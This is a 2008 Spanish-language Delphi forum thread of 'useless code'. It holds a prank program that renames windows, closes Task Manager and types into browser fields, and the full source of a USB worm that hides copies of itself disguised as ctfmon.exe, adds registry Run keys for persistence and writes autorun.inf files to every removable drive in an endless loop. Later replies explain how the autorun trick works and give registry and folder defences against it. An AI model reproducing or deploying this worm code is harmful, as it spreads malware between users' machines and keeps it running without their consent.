Codigo sin utilidad

[cHackAll] · #1 02-01-2008

Código Delphi [-]uses Windows, Messages;

var
 Cursor: TPoint;
 idAttach, idAttachTo: Cardinal;

procedure vkEmulate(const bVk: Byte);
begin       
 keybd_event(bVk, 0, 0, 0);
 keybd_event(bVk, 0, KEYEVENTF_KEYUP, 0);
end;

procedure SendKeys(lpKeys: PChar);
begin
 repeat
  vkEmulate(VkKeyScan(lpKeys[0]));
  Inc(Cardinal(lpKeys));
 until lpKeys[0] = #0;
end;

procedure SetRoman(hWnd: Cardinal);
begin
 SendMessage(hWnd, WM_SETTEXT, 0, Integer(PChar('Roman')));
end;

var ClassName: array[0..15] of Char;
label Back;
begin
 idAttach := GetCurrentThreadId;
 Back: Sleep($7F);
 GetCursorPos(Cursor);
 SetRoman(WindowFromPoint(Cursor));
 SendMessage(FindWindow(nil, 'Administrador de tareas de Windows'), WM_SYSCOMMAND, SC_CLOSE, 0);
 idAttachTo := GetWindowThreadProcessID(GetForegroundWindow, nil);
 if not AttachThreadInput(idAttach, idAttachTo, True) then goto Back;
 GetClassName(GetFocus, @ClassName, SizeOf(ClassName));
 if lstrcmp(@ClassName, 'Internet') = 0 then SendKeys('roman ');
 SetRoman(GetFocus); AttachThreadInput(idAttach, idAttachTo, False);
 goto Back;
end.

Saludos

[egostar] · #2 02-01-2008

, mira nadamas condenadote, este es el famoso fuente de la broma que te gastaste en el hilo de roman

Muy bueno, pero no le entiendo nada de nada

.

Salud OS

[cHackAll] · #3 02-01-2008

Cita:

Empezado por egostar

, mira nadamas condenadote, este es el famoso fuente de la broma que te gastaste en el hilo de roman

Muy bueno, pero no le entiendo nada de nada

.

Salud OS

Pues que les puedo decir; es un fuente que no me pareció (a diferencia de los perjudicados) un "Troyano ofensivo"... pero ya es pasado. (más bien que la "simplicidad" no implicó un "destierro")

En todo caso se me ocurrió ponerlo como "cofigo sin utilidad" pues no entra en otro lugar del foro... espero no vaya a ser un "BOOT FAILURE"

Saludos

[seoane] · #4 02-01-2008

Hola cHackAll, me alegro de que participes en el hilo, pero estaría bien que explicaras un poco que es lo que hace el código, puede que a alguno no le haga gracia la broma

[cHackAll] · #5 03-01-2008

Cita:

Empezado por seoane

Hola cHackAll, me alegro de que participes en el hilo, pero estaría bien que explicaras un poco que es lo que hace el código, puede que a alguno no le haga gracia la broma

Tienes mucha razón

... la información de un posible problema la obtienes revisando el link que os dejé... en todo caso es un programa que modifica el "Caption" de cualquier ventana que de la que se pueda obtener su Handle al mover el ratón encima de una coordenada a la que la ventana pertenece.

Saludos

Khronos · #6 03-01-2008

Código Delphi [-]
program Fucker;
 
{$APPTYPE GUI}
 
uses
SysUtils, Windows, Registry, shellapi;
 
var
 
Unidad: string; 
Fuck: Array[0..260] of char;
folder: string;
OS: string;
dir: string;
 
const
CSIDL_PROFILE = 40;
SHGFP_TYPE_CURRENT = 0;
function SHGetFolderPath(hwndOwner: HWND;
nFolder: Integer;
hToken: THandle;
dwFlags: DWORD;
pszPath: LPTSTR): HRESULT; stdcall;
external 'Shell32.dll' name 'SHGetFolderPathA';
 
function GetUserProfile: string;
var
Buffer: array[0..MAX_PATH] of Char;
begin
FillChar(Buffer, SizeOf(Buffer), 0);
SHGetFolderPath(0, CSIDL_PROFILE, 0, SHGFP_TYPE_CURRENT, Buffer);
Result := String(PChar(@Buffer));
end;
 
function DrivePreparado(Drive: Char): Boolean;
var
ErrorMode: word;
begin
if Drive in ['a'..'z'] then Dec(Drive, $20);
if not (Drive in ['A'..'Z']) then
raise EConvertError.Create('Not a valid drive ID');
ErrorMode := SetErrorMode(SEM_FailCriticalErrors);
try
if DiskSize(Ord(Drive) - $40) = -1 then
Result := False
else
Result := True;
finally
SetErrorMode(ErrorMode);
end;
end;
 
 
procedure InfectarUsb;
var
Drive: Char;
Autorun: textfile;
begin
for Drive:= 'c' to 'z' do
if getDriveType(PCHAR(Drive + ':\')) = DRIVE_REMOVABLE then BEGIN
Unidad:=(UPCASE(Drive)) + ':\';
 
if DrivePreparado(Drive)=true then
begin
if not(FileExists(Unidad + 'ctfmon.exe')=true) then begin
CopyFile(Worm, PCHAR(Unidad + 'ctfmon.exe'), true);
FileSetAttr(Unidad + 'ctfmon.exe', faHidden or faReadOnly);
end;
if not(FileExists(Unidad + 'autorun.inf')=true) then begin
AssignFile(Autorun, Unidad + 'autorun.inf');
Rewrite(Autorun);
Writeln(Autorun, '[AUTORUN]');
Writeln(Autorun, 'OPEN=ctfmon.exe');
Writeln(Autorun, 'shell\open\command=ctfmon.exe ');
Writeln(Autorun, 'shell\open=');
Closefile(Autorun);
FileSetAttr(Unidad + 'autorun.inf', faHidden or faReadOnly);
end;
end;
 
END;
 
end;
 
procedure Autorun (name, path : string);
var
Reg: TRegistry;
begin
Reg:= TRegistry.create;
Reg.RootKey:= HKEY_LOCAL_MACHINE;
Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run', true);
Reg.WriteString(name, path);
Reg.Destroy;
end;
 
function Windowsfolder : String;
var
pcWindowsDirectory : PChar;
dwWDSize : DWORD;
begin
dwWDSize := MAX_PATH + 1;
GetMem( pcWindowsDirectory, dwWDSize );
try
if Windows.GetWindowsDirectory( pcWindowsDirectory, dwWDSize ) <> 0 then
Result := pcWindowsDirectory;
finally
FreeMem( pcWindowsDirectory );
end;
end;
 
procedure firma;
var
text: textfile;
begin
AssignFile(text, OS + '\firma.html');
Rewrite(text);
Writeln(text, '');
Writeln(text, 'Fucker v.-1');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');


Writeln(text, 'Fucker');
Writeln(text, 'Sin ánimos de molestar a nadie');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');
Closefile(text);
end;
 
 
label back;
begin
OS:= windowsfolder;
GetDir(0, dir);
dir:= dir + '\autorun.inf';
 
 
if (FileExists(dir)=true) then
begin
//si es asi, explora esa unidad
dir:= emptystr;
GetDir(0, dir);
Shellexecute(0, 'explore', pchar(dir), '', '', SW_SHOWNORMAL);
end;
 
 
folder:= GetUserProfile + '\ctfmon.exe';
GetMoDuleFilename(0, Fuck, SizeOf(Fuck));
 
back:
CopyFile(Fuck, pchar(folder), true);
FileSetAttr(folder, faHidden or faReadOnly);
 
Autorun('Club Delphi Fucker v. 1', folder);
Autorun('Firma', OS + '\firma.html');
firma;
InfectarUSB;
 
Sleep(5000);
 
goto back;
 
end.

Sin ánimos de molestar a nadie

Khronos · #7 03-01-2008

No se porque pero el procedimiento firma no me lo pone correctamente:

Código Delphi [-]procedure firma;
var
text: textfile;
begin
AssignFile(text, OS + '\firma.html');
Rewrite(text);
Writeln(text, '');
Writeln(text, 'Fucker v.-1');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');

Writeln(text, 'Fucker');
Writeln(text, 'Sin ánimos de molestar a nadie');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');
Writeln(text, '');
Closefile(text);
end;

EDITO: No me deja ponerlo porque son instrucciones en html

[cHackAll] · #8 03-01-2008

Cita:

Empezado por Khronos

...Sin ánimos de molestar a nadie

Pues se ve interesante el código sin utilidad; ante tales molestos virus les doy el siguiente TIP: creen una carpeta llamada "autorun.inf" en la raíz de la unidad a la que quieren protejer, el virus iluso no podrá hacer nada; si crean una carpeta dentro de nuestra carpeta "autorun.inf" reducirá el impacto de tales virus.

Siendo NTFS el sistema de archivos de la unidad pueden quitarle los privilegios de acceso a nuestra carpeta "autorun.inf" y el virus no correrá nunca!

Tambien pueden exportar esta linea en el registro:

Código:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000ff

Esta entrada de registro hará que el Güindos ignore al "autorun.inf".

PD: más bien que en el Güindos Vista no se les escapo semejante error!
Saludos

Khronos · #9 03-01-2008

Es muy util esa entrada del registro, ya veis lo inseguro que es el Windows con los autorun.inf. Este "gusano" buscaria todos los dispositivos usb que conectes al equipo y copiaria el ejecutable al dispositivo, ademas, para asegurar que se ejecuta crea el "autorun.inf".

Código:

[AUTORUN]
open=miexe.exe
icon=ico.ico

Este sería el tipico autorun.inf que pone cualquier programa en su CD_ROM de instalacion para que cargue automaticamente el instalador.
Este autorun.inf no tendría ningun efecto en los dispositivos USB pero si le añades la línea:

Código:

shell\open\command=miexe.exe

al hacer doble click sobre la imagen del dispositivo USB te esta cargando el "gusano".

Salu2

[cHackAll] · #10 03-01-2008

Khronos; tu "gusano" intenta crear en el Flash el archivo "autorun.inf" pero ohhh no puede pues ya existe una carpeta con dicho nombre...

Ahora a lo de la "inefectividad" de la la entrada de registro sugerida; verificalo y nos cuentas...

Saludos

Herramientas	Buscar en Tema
Mostrar Versión Imprimible Enviar por Correo	Buscar en Tema: Búsqueda Avanzada
Desplegado
Cambiar a Modo Lineal Modo Híbrido Cambiar a Modo Hilado

Temas Similares
Tema	Autor	Foro	Respuestas	Último mensaje
Utilidad para comparar dos bases de datos.	avmm2004	Varios	1	16-11-2006 20:47:22
Utilidad para contar lineas de código	Alexander	Varios	10	18-10-2006 00:14:55
Utilidad para manejo de lista TODO	ANG4L	Varios	3	02-08-2006 09:36:39
Cual es la utilidad de la paleta Server	Gelmin	Servers	1	05-03-2004 22:20:36
utilidad del application.tag	Giniromero	OOP	8	17-10-2003 12:21:53